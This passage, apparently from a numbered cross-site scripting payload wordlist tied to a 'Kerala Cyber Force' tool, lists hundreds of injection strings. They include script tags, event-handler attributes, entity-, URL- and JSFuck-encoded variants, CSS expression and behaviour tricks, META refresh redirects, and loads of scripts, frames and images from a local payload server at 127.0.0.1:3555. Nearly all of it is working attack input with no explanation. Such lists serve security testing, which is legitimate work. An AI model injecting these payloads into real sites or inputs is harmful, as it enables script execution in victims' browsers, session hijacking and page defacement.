  1041. <img src='http://127.0.0.1:3555/xss_serve_payloads/X.html' onload=alert(1)//></img>
  1042. "><img src='http://127.0.0.1:3555/xss_serve_payloads/X.html' onload=alert(1)//></img>
  1043. '><img src='http://127.0.0.1:3555/xss_serve_payloads/X.html' onload=alert(1)//></img>
  1044. <script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
  1045. "><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
  1046. '><script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
  1047. <img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  1048. "><img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  1049. '><img src=&#106;&#97;&#118;&#97;&#115;&#99; &#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
  1050. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>
  1051. "><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>
  1052. '><IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69 &#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27 &#x58&#x53&#x53&#x27&#x29>
  1053. <img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>
  1054. "><img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>
  1055. '><img src=&#0000106&#0000097&#0000118&#0000097 &#0000115&#0000099&#0000114&#0000105&#0000112 &#0000116&#0000058&#0000097&#0000108&#0000101 &#0000114&#0000116&#0000040&#0000039&#0000088 &#0000083&#0000083&#0000039&#0000041>
  1056. “><script>prompt(1)</script>
  1057. "><script>prompt(1)</script>
  1058. '><script>prompt(1)</script>
  1059. “><script>alert(String.fromCharCode(75,67,70))</script>
  1060. "><script>alert(String.fromCharCode(75,67,70))</script>
  1061. '><script>alert(String.fromCharCode(75,67,70))</script>
  1062. ‘><script>prompt(1)</script>
  1063. "><script>prompt(1)</script>
  1064. '><script>prompt(1)</script>
  1065. ‘><script>alert(String.fromCharCode(75,67,70))</script>
  1066. "><script>alert(String.fromCharCode(75,67,70))</script>
  1067. '><script>alert(String.fromCharCode(75,67,70))</script>
  1068. <ScRIPt>prompt(1)</ScRIPt>
  1069. "><ScRIPt>prompt(1)</ScRIPt>
  1070. '><ScRIPt>prompt(1)</ScRIPt>
  1071. <ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
  1072. "><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
  1073. '><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
  1074. “><ScRIPt>prompt(1)</ScRIPt>
  1075. "><ScRIPt>prompt(1)</ScRIPt>
  1076. '><ScRIPt>prompt(1)</ScRIPt>
  1077. “><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
  1078. "><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
  1079. '><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
  1080. ‘><ScRIPt>prompt(1)</ScRIPt>
  1081. "><ScRIPt>prompt(1)</ScRIPt>
  1082. '><ScRIPt>prompt(1)</ScRIPt>
  1083. ‘><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
  1084. "><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
  1085. '><ScRIPt<aLeRT(String.fromCharCode(75,67,70))</ScRIPt>
  1086. </script><script>prompt(1)</script>
  1087. "><script>prompt(1)</script>
  1088. '><script>prompt(1)</script>
  1089. "></script><script>prompt(1)</script>
  1090. "><script>prompt(1)</script>
  1091. '><script>prompt(1)</script>
  1092. '></script><script>prompt(1)</script>
  1093. "><script>prompt(1)</script>
  1094. '><script>prompt(1)</script>
  1095. </script><script>alert(String.fromCharCode(75,67,70))</script>
  1096. "></script><script>alert(String.fromCharCode(75,67,70))</script>
  1097. '></script><script>alert(String.fromCharCode(75,67,70))</script>
  1098. "><script>alert(String.fromCharCode(75,67,70))</script>
  1099. '><script>alert(String.fromCharCode(75,67,70))</script>
  1100. “/><script>prompt(1)</script>
  1101. "><script>prompt(1)</script>
  1102. '><script>prompt(1)</script>
  1103. “/><script>alert(String.fromCharCode(75,67,70))</script>
  1104. "><script>alert(String.fromCharCode(75,67,70))</script>
  1105. '><script>alert(String.fromCharCode(75,67,70))</script>
  1106. ‘/><script>prompt(1)</script>
  1107. "><script>prompt(1)</script>
  1108. '><script>prompt(1)</script>
  1109. ‘/><script>alert(String.fromCharCode(75,67,70))</script>
  1110. "><script>alert(String.fromCharCode(75,67,70))</script>
  1111. '><script>alert(String.fromCharCode(75,67,70))</script>
  1112. </SCRIPT>”><SCRIPT>prompt(1)</SCRIPT>
  1113. "></SCRIPT>”><SCRIPT>prompt(1)</SCRIPT>
  1114. '></SCRIPT>”><SCRIPT>prompt(1)</SCRIPT>
  1115. </SCRIPT>”><SCRIPT>alert(String.fromCharCode(75,67,70))
  1116. "></SCRIPT>”><SCRIPT>alert(String.fromCharCode(75,67,70))
  1117. '></SCRIPT>”><SCRIPT>alert(String.fromCharCode(75,67,70))
  1118. </SCRIPT>”>”><SCRIPT>prompt(1)</SCRIPT>
  1119. "></SCRIPT>”>”><SCRIPT>prompt(1)</SCRIPT>
  1120. '></SCRIPT>”>”><SCRIPT>prompt(1)</SCRIPT>
  1121. </SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>
  1122. "></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>
  1123. '></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>
  1124. %27%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E
  1125. %22%3E%3C%73%63%72%69%70%74%3E%4B%43%46%3C%2F%73%63%72%69%70%74%3E
  1126. %25%32%37%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45
  1127. %25%32%32%25%33%45%25%33%43%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45%25%34%42%25%34%33%25%34%36%25%33%43%25%32%46%25%37%33%25%36%33%25%37%32%25%36%39%25%37%30%25%37%34%25%33%45
  1128. %25%32%35%25%33%32%25%33%32%25%32%35%25%33%33%25%34%35%25%32%35%25%33%33%25%34%33%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35%25%32%35%25%33%34%25%34%32%25%32%35%25%33%34%25%33%33%25%32%35%25%33%34%25%33%36%25%32%35%25%33%33%25%34%33%25%32%35%25%33%32%25%34%36%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%39%25%32%35%25%33%37%25%33%30%25%32%35%25%33%37%25%33%34%25%32%35%25%33%33%25%34%35
  1129. <h1>X</h1>
  1130. "><h1>X</h1>
  1131. '><h1>X</h1>
  1132. <marquee>Kerala Cyber Force</marquee>
  1133. "><marquee>Kerala Cyber Force</marquee>
  1134. '><marquee>Kerala Cyber Force</marquee>
  1135. <br><br><b><u>X</u></b>
  1136. "><br><br><b><u>X</u></b>
  1137. '><br><br><b><u>X</u></b>
  1138. <script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>
  1139. "><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>
  1140. '><script>window.open( "http://127.0.0.1:3555/xss_serve_payloads/X.html" )</script>
  1141. <script>alert%281%29</script>
  1142. "><script>alert%281%29</script>
  1143. '><script>alert%281%29</script>
  1144. <script>alert(1)</script>
  1145. "><script>alert(1)</script>
  1146. '><script>alert(1)</script>/
  1147. "><script>alert(1)</script>/
  1148. '><script>alert(1)</script>/
  1149. <script%20language=vbscript>msgbox%20X</script>
  1150. "><script%20language=vbscript>msgbox%20X</script>
  1151. '><script%20language=vbscript>msgbox%20X</script>
  1152. ></title><script>alert(X)</script>'"><marquee><h1>Kerala Cyber Force</h1></marquee>
  1153. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1154. "><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1155. '><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/X.js"></SCRIPT>
  1156. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1157. "><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1158. '><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp"></SCRIPT>
  1159. ‘;!–<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}
  1160. !–<SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>=&{}
  1161. <img src="blah"onmouseover="alert(1);">
  1162. "><img src="blah"onmouseover="alert(1);">
  1163. '><img src="blah"onmouseover="alert(1);">
  1164. <img src="blah>" onmouseover="alert(1);">
  1165. "><img src="blah>" onmouseover="alert(1);">
  1166. '><img src="blah>" onmouseover="alert(1);">
  1167. <IMG SRC="javascript:alert(1);"
  1168. "><IMG SRC="javascript:alert(1);"
  1169. '><IMG SRC="javascript:alert(1);">
  1170. "><IMG SRC="javascript:alert(1);"
  1171. "><IMG SRC="javascript:alert(1);"
  1172. '><IMG SRC="javascript:alert(1);">
  1173. '><IMG SRC="javascript:alert(1);"
  1174. "><IMG SRC="javascript:alert(1);"
  1175. '><IMG SRC="javascript:alert(1);">
  1176. <IMG SRC="javascript:alert(1);"
  1177. "><IMG SRC="javascript:alert(1);"
  1178. '><IMG SRC="javascript:alert(1);"
  1179. <IMG SRC=javascript:alert(1)>
  1180. "><IMG SRC=javascript:alert(1)>
  1181. '><IMG SRC=javascript:alert(1)>
  1182. <IMG SRC=JaVaScRiPt:alert(1)>
  1183. "><IMG SRC=JaVaScRiPt:alert(1)>
  1184. '><IMG SRC=JaVaScRiPt:alert(1)>
  1185. </TITLE><SCRIPT>alert(1);</SCRIPT>
  1186. "><SCRIPT>alert(1);</SCRIPT>
  1187. '><SCRIPT>alert(1);</SCRIPT>
  1188. "></TITLE><SCRIPT>alert(1);</SCRIPT>
  1189. "><SCRIPT>alert(1);</SCRIPT>
  1190. '><SCRIPT>alert(1);</SCRIPT>
  1191. '></TITLE><SCRIPT>alert(1);</SCRIPT>
  1192. "><SCRIPT>alert(1);</SCRIPT>
  1193. '><SCRIPT>alert(1);</SCRIPT>
  1194. <IMG SRC=javascript:alert(&quot;X&quot;)>
  1195. "><IMG SRC=javascript:alert(&quot;X&quot;)>
  1196. '><IMG SRC=javascript:alert(&quot;X&quot;)>
  1197. <IMG SRC=`javascript:alert("Kerala Cyber Force, 'X'")`>
  1198. "><IMG SRC=`javascript:alert("Kerala Cyber Force, 'X'")`>
  1199. '><IMG SRC=`javascript:alert("Kerala Cyber Force, 'X'")`>
  1200. <IMG """><SCRIPT>alert(1)</SCRIPT>">
  1201. "><IMG """><SCRIPT>alert(1)</SCRIPT>">
  1202. '><IMG """><SCRIPT>alert(1)</SCRIPT>">
  1203. <img/src="1"/onerror="alert(1)"
  1204. "><img/src="1"/onerror="alert(1)"
  1205. '><img/src="1"/onerror="alert(1)"
  1206. SCRIPT>">'><SCRIPT>alert(String.fromCharCode(75,67,70))</SCRIPT>
  1207. <IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>
  1208. "><IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>
  1209. '><IMG SRC=javascript:alert(String.fromCharCode(75,67,70))>
  1210. <IMG SRC="jav ascript:alert(1);">
  1211. "><IMG SRC="jav ascript:alert(1);">
  1212. '><IMG SRC="jav ascript:alert(1);">
  1213. <IMG SRC="jav&#x09;ascript:alert(1);">
  1214. "><IMG SRC="jav&#x09;ascript:alert(1);">
  1215. '><IMG SRC="jav&#x09;ascript:alert(1);">
  1216. <IMG SRC="jav&#x0A;ascript:alert(1);">
  1217. "><IMG SRC="jav&#x0A;ascript:alert(1);">
  1218. '><IMG SRC="jav&#x0A;ascript:alert(1);">
  1219. <IMG SRC="jav&#x0D;ascript:alert(1);">
  1220. "><IMG SRC="jav&#x0D;ascript:alert(1);">
  1221. '><IMG SRC="jav&#x0D;ascript:alert(1);">
  1222. <IMG SRC=" &#14; javascript:alert(1);">
  1223. "><IMG SRC=" &#14; javascript:alert(1);">
  1224. '><IMG SRC=" &#14; javascript:alert(1);">
  1225. <script>prompt(1)</script>
  1226. "><script>prompt(1)</script>
  1227. '><script>prompt(1)</script>
  1228. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1)>
  1229. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1)>
  1230. '><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(1)>
  1231. <body onload="alert(1);">
  1232. "><body onload="alert(1);">
  1233. '><body onload="alert(1);">
  1234. <body onload="alert(1)">
  1235. "><body onload="alert(1)">
  1236. '><body onload="alert(1)">
  1237. <img src="javascript:alert(1)">
  1238. "><img src="javascript:alert(1)">
  1239. '><img src="javascript:alert(1)">
  1240. <p style="background:url('javascript:alert(1)')">
  1241. "><p style="background:url('javascript:alert(1)')">
  1242. '><p style="background:url('javascript:alert(1)')">
  1243. ' style=abc:expression(X) ' \" style=abc:expression(X) \"
  1244. " type=image src=null onerror=X " \' type=image src=null onerror=X \'
  1245. onload='X' \" onload=\"X\"/onload=\"X\"/onload='X'/
  1246. \'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=X>
  1247. <<scr\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/X.js></script
  1248. "><<scr\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/X.js></script
  1249. '><<scr\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/X.js></script
  1250. <<scr\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script
  1251. "><<scr\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script
  1252. '><<scr\0ipt/src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp></script
  1253. <img src="x:gif" onerror="window['al\u0065rt'](1)"></img>
  1254. "><img src="x:gif" onerror="window['al\u0065rt'](1)"></img>
  1255. '><img src="x:gif" onerror="window['al\u0065rt'](1)"></img>
  1256. <img src="x:gif" onerror="eval('al'%2b'lert(1)')">
  1257. "><img src="x:gif" onerror="eval('al'%2b'lert(1)')">
  1258. '><img src="x:gif" onerror="eval('al'%2b'lert(1)')">
  1259. <img src="x:alert" onerror="eval(src%2b'(1)')">
  1260. "><img src="x:alert" onerror="eval(src%2b'(1)')">
  1261. '><img src="x:alert" onerror="eval(src%2b'(1)')">
  1262. <img/src="mars.png"alt="mars">
  1263. "><img/src="mars.png"alt="mars">
  1264. '><img/src="mars.png"alt="mars">
  1265. <object data="javascript:alert(1)">
  1266. "><object data="javascript:alert(1)">
  1267. '><object data="javascript:alert(1)">
  1268. <isindex type=image src=1 onerror=alert(1)>
  1269. "><isindex type=image src=1 onerror=alert(1)>
  1270. '><isindex type=image src=1 onerror=alert(1)>
  1271. <isindex action=javascript:alert(1) type=image>
  1272. "><isindex action=javascript:alert(1) type=image>
  1273. '><isindex action=javascript:alert(1) type=image>
  1274. <img src=x:alert(alt) onerror=eval(src) alt=0>
  1275. "><img src=x:alert(alt) onerror=eval(src) alt=0>
  1276. '><img src=x:alert(alt) onerror=eval(src) alt=0>
  1277. <x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
  1278. "><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
  1279. '><x:script xmlns:x="http://www.w3.org/1999/xhtml">alert(1);</x:script>
  1280. <img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/>
  1281. "><img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/>
  1282. '><img src=foo.png onerror=%61%6C%65%72%74%28%2F%4B%43%46%2F%29/>
  1283. ";location='javascript:alert(1)';
  1284. ";location=location.hash)//#0={};alert(1)
  1285. ";eval(unescape(location))//#%0Aalert(1)
  1286. <b/alt="1"onmouseover=InputBox+1language=vbs>X</b>
  1287. "><b/alt="1"onmouseover=InputBox+1language=vbs>X</b>
  1288. '><b/alt="1"onmouseover=InputBox+1language=vbs>X</b>
  1289. <b "<script>alert(1)</script>
  1290. "><script>alert(1)</script>
  1291. '><script>alert(1)</script>">X</b>
  1292. </a onmousemove="alert(1)">
  1293. "></a onmousemove="alert(1)">
  1294. '></a onmousemove="alert(1)">
  1295. data:text/html,<script>alert(1)</script>
  1296. "><script>alert(1)</script>
  1297. '><script>alert(1)</script>
  1298. <img src="x:ö" title="onerror=alert(1)//">
  1299. "><img src="x:ö" title="onerror=alert(1)//">
  1300. '><img src="x:ö" title="onerror=alert(1)//">
  1301. <img src="x:? title=" onerror=alert(1)//">
  1302. "><img src="x:? title=" onerror=alert(1)//">
  1303. '><img src="x:? title=" onerror=alert(1)//">
  1304. ¼script¾alert(¢X¢)¼/script¾
  1305. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">
  1306. "><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">
  1307. '><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(1);">
  1308. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  1309. "><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  1310. '><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
  1311. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">
  1312. "><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">
  1313. '><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(1);">
  1314. <DIV STYLE="background-image: url(javascript:alert(1))">
  1315. "><DIV STYLE="background-image: url(javascript:alert(1))">
  1316. '><DIV STYLE="background-image: url(javascript:alert(1))">
  1317. <div style="background-image: url(javascript:alert(1););">
  1318. "><div style="background-image: url(javascript:alert(1););">
  1319. '><div style="background-image: url(javascript:alert(1););">
  1320. <DIV STYLE="background-image: url(&#1;javascript:alert(1))">
  1321. "><DIV STYLE="background-image: url(&#1;javascript:alert(1))">
  1322. '><DIV STYLE="background-image: url(&#1;javascript:alert(1))">
  1323. <div style="behaviour: url(http://127.0.0.1:3555/xss_serve_payloads/X.html);">
  1324. "><div style="behaviour: url(http://127.0.0.1:3555/xss_serve_payloads/X.html);">
  1325. '><div style="behaviour: url(http://127.0.0.1:3555/xss_serve_payloads/X.html);">
  1326. <div style="binding: url(http://127.0.0.1:3555/xss_serve_payloads/X.html));">
  1327. "><div style="binding: url(http://127.0.0.1:3555/xss_serve_payloads/X.html));">
  1328. '><div style="binding: url(http://127.0.0.1:3555/xss_serve_payloads/X.html));">
  1329. <div style="behaviour: url('http://127.0.0.1:3555/xss_serve_payloads/X.html');">
  1330. "><div style="behaviour: url('http://127.0.0.1:3555/xss_serve_payloads/X.html');">
  1331. '><div style="behaviour: url('http://127.0.0.1:3555/xss_serve_payloads/X.html');">
  1332. <div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/X.html"));">
  1333. "><div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/X.html"));">
  1334. '><div style="binding: url("http://127.0.0.1:3555/xss_serve_payloads/X.html"));">
  1335. <SCRIPT <B>alert(1);</SCRIPT>
  1336. "><SCRIPT <B>alert(1);</SCRIPT>
  1337. '><SCRIPT <B>alert(1);</SCRIPT>
  1338. <<SCRIPT>alert(1);/
  1339. "><<SCRIPT>alert(1);/
  1340. '><<SCRIPT>alert(1);//<</SCRIPT>
  1341. "><<SCRIPT>alert(1);//<</SCRIPT>
  1342. '><<SCRIPT>alert(1);//<</SCRIPT>
  1343. <<script>alert(1);</script>
  1344. "><<script>alert(1);</script>
  1345. '><<script>alert(1);</script>
  1346. "><script>alert(1);</script>
  1347. '><script>alert(1);</script>
  1348. <INPUT TYPE="IMAGE" SRC="javascript:alert(1);">
  1349. "><INPUT TYPE="IMAGE" SRC="javascript:alert(1);">
  1350. '><INPUT TYPE="IMAGE" SRC="javascript:alert(1);">
  1351. <IMG SRC="javascript:alert(1)"
  1352. "><IMG SRC="javascript:alert(1)"
  1353. '><IMG SRC="javascript:alert(1)"
  1354. <iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <
  1355. "><iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <
  1356. '><iframe src=http://127.0.0.1:3555/xss_serve_payloads/X.html <
  1357. <SCRIPT>a=/X/
  1358. "><SCRIPT>a=/X/
  1359. '><SCRIPT>a=/X/alert(a.source)</SCRIPT>
  1360. "><SCRIPT>a=/X/alert(a.source)</SCRIPT>
  1361. '><SCRIPT>a=/X/alert(a.source)</SCRIPT>
  1362. \";alert(1);//
  1363. <input onfocus=javascript:alert(1) autofocus>
  1364. "><input onfocus=javascript:alert(1) autofocus>
  1365. '><input onfocus=javascript:alert(1) autofocus>
  1366. <select onfocus=javascript:alert(1) autofocus>
  1367. "><select onfocus=javascript:alert(1) autofocus>
  1368. '><select onfocus=javascript:alert(1) autofocus>
  1369. <textarea onfocus=javascript:alert(1) autofocus>
  1370. "><textarea onfocus=javascript:alert(1) autofocus>
  1371. '><textarea onfocus=javascript:alert(1) autofocus>
  1372. <keygen onfocus=javascript:alert(1) autofocus>
  1373. "><keygen onfocus=javascript:alert(1) autofocus>
  1374. '><keygen onfocus=javascript:alert(1) autofocus>
  1375. <input autofocus onfocus=alert(1)>
  1376. "><input autofocus onfocus=alert(1)>
  1377. '><input autofocus onfocus=alert(1)>
  1378. <iframe/ /onload=alert(1)></iframe>
  1379. "><iframe/ /onload=alert(1)></iframe>
  1380. '><iframe/ /onload=alert(1)></iframe>
  1381. <iframe/ "onload=alert(1)></iframe>
  1382. "><iframe/ "onload=alert(1)></iframe>
  1383. '><iframe/ "onload=alert(1)></iframe>
  1384. <iframe///////onload=alert(1)></iframe>
  1385. "><iframe///////onload=alert(1)></iframe>
  1386. '><iframe///////onload=alert(1)></iframe>
  1387. <iframe "onload=alert(1)></iframe>
  1388. "><iframe "onload=alert(1)></iframe>
  1389. '><iframe "onload=alert(1)></iframe>
  1390. <iframe<?php echo chr(11)?> onload=alert(1)></iframe>
  1391. "><iframe<?php echo chr(11)?> onload=alert(1)></iframe>
  1392. '><iframe<?php echo chr(11)?> onload=alert(1)></iframe>
  1393. <iframe<?php echo chr(12)?> onload=alert(1)></iframe>
  1394. "><iframe<?php echo chr(12)?> onload=alert(1)></iframe>
  1395. '><iframe<?php echo chr(12)?> onload=alert(1)></iframe>
  1396. <ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script>
  1397. "></script><script>alert(String.fromCharCode(75,67,70))</script>
  1398. '></script><script>alert(String.fromCharCode(75,67,70))</script>
  1399. "><script>alert(String.fromCharCode(75,67,70))</script>
  1400. '><script>alert(String.fromCharCode(75,67,70))</script><script src=http://127.0.0.1:3555/xss_serve_payloads/X.js>
  1401. <ScRIPT x src=//0x.lv?</style></script><script>alert(String.fromCharCode(75,67,70))</script>
  1402. "></script><script>alert(String.fromCharCode(75,67,70))</script>
  1403. '></script><script>alert(String.fromCharCode(75,67,70))</script>
  1404. "><script>alert(String.fromCharCode(75,67,70))</script>
  1405. '><script>alert(String.fromCharCode(75,67,70))</script><script src=http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp>
  1406. </script><script>alert(X
  1407. "></script><script>alert(X
  1408. '></script><script>alert(X
  1409. %7D%3C/style%3E43%27%22%3E%3C/title%3E%3Cscript%3Ea=eval;b=alert;a(b(/X/.source));%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3EX%3C/h1%3E%3C/marquee%3E
  1410. &#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#75;&#67;&#70;&#34;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
  1411. <FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>
  1412. "><FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>
  1413. '><FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>
  1414. ')alert(1);
  1415. ");alert(1);
  1416. “;alert(“X”);”
  1417. “;alert(String.fromCharCode(75,67,70));”
  1418. ‘;alert(“X”);’
  1419. ‘;alert(String.fromCharCode(75,67,70));’
  1420. “;alert(“X”)
  1421. “;alert(String.fromCharCode(75,67,70))
  1422. ‘;alert(“X”)
  1423. ‘;alert(String.fromCharCode(75,67,70))
  1424. <script>var var = 1; alert(var)</script>
  1425. "><script>var var = 1; alert(var)</script>
  1426. '><script>var var = 1; alert(var)</script>
  1427. <script type=text/javascript>alert(1)</script>
  1428. "><script type=text/javascript>alert(1)</script>
  1429. '><script type=text/javascript>alert(1)</script>
  1430. “><script >alert(1)</script>
  1431. <iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" width="800" height="800">iframe</iframe>
  1432. "><iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" width="800" height="800">iframe</iframe>
  1433. '><iframe src="http://127.0.0.1:3555/xss_serve_payloads/X.html" width="800" height="800">iframe</iframe>
  1434. <IMG SRC=`javascript:alert(“X says, ‘X’”)`>
  1435. "><IMG SRC=`javascript:alert(“X says, ‘X’”)`>
  1436. '><IMG SRC=`javascript:alert(“X says, ‘X’”)`>
  1437. <img src = ”http://127.0.0.1:3555/xss_serve_payloads/X.js”>
  1438. "><img src = ”http://127.0.0.1:3555/xss_serve_payloads/X.js”>
  1439. '><img src = ”http://127.0.0.1:3555/xss_serve_payloads/X.js”>
  1440. <img src = ”http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp”>
  1441. "><img src = ”http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp”>
  1442. '><img src = ”http://127.0.0.1:3555/xss_serve_payloads/bmpz.bmp”>
  1443. <A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>
  1444. "><A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>
  1445. '><A HREF="//127.0.0.1:3555/xss_serve_payloads/X.html">X</A>
  1446. <A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>
  1447. "><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>
  1448. '><A HREF="http://127.0.0.1:3555/xss_serve_payloads/X.html./">X</A>
  1449. <A HREF="javascript:document.location='http://127.0.0.1:3555/xss_serve_payloads/X.html'">X</A>
  1450. "><A HREF="javascript:document.location='http://127.0.0.1:3555/xss_serve_payloads/X.html'">X</A>
  1451. '><A HREF="javascript:document.location='http://127.0.0.1:3555/xss_serve_payloads/X.html'">X</A>
  1452. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#75;&#67;&#70;&#39;&#41;&#59;>
